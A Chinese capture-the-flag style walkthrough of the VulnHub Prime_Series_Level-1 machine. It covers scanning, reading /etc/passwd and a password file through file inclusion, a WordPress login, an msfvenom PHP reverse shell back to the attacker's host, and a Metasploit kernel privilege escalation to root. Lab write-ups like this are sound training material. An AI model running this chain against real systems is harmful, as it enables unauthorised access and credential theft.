本周实践的是vulnhub的Prime_Series_Level-1镜像,
下载地址,https://download.vulnhub.com/prime/Prime_Series_Level-1.rar,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.220.0/24,
获取到靶机地址是192.168.220.167,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.167,
发现靶机有22端口的ssh服务和80端口的http服务,
对http服务做php路径扫描,dirb http://192.168.220.167 -X .php,
获取到http://192.168.220.167/index.php,
以及http://192.168.220.167/image.php,
对http服务做txt路径扫描,dirb http://192.168.220.167 -X .txt,
获取到http://192.168.220.167/secret.txt,
浏览器访问http://192.168.220.167/secret.txt,
获取到location.txt的提示,
浏览器访问http://192.168.220.167/index.php?file=,
提示需要包含正确的文件,
浏览器访问http://192.168.220.167/index.php?file=location.txt,
获取到secrettier360参数的提示,
浏览器访问http://192.168.220.167/image.php?secrettier360=/etc/passwd,
获取到saket:x:1001:1001:find password.txt file in my directory:/home/saket,
浏览器访问http://192.168.220.167/image.php?secrettier360=/home/saket/password.txt,
获取到follow_the_ippsec,可能是个密码,
重新暴破http服务的路径,dirb http://192.168.220.167,
获取到http://192.168.220.167/wordpress,
以及http://192.168.220.167/wordpress/wp-admin,
浏览器访问http://192.168.220.167/wordpress,
获取到用户名victor,
浏览器访问http://192.168.220.167/wordpress/wp-admin,
用victor/follow_the_ippsec登录,
找到一个可以上传php内容的页面,
在kali攻击机制作反弹shell的php内容,
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.220.157 lport=4444 R,
提交到靶机的页面,
kali攻击机本地开启反弹shell监听,
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.220.157
set lport 4444
exploit
浏览器访问http://192.168.220.167/wordpress/wp-content/themes/twentynineteen/secret.php,
获取到反弹shell,
getuid确认不是root,sysinfo获取到ubuntu 4.10.0-28-generic,
网上搜索4.10.0-28 kernel exploit,获取到提权方法,
当前shell退到后台,background,进行新的漏洞利用,
use exploit/linux/local/bpf_sign_extension_priv_esc
set session 1
exploit
获取到新的shell,getuid确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Prime_Series_Level-1的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论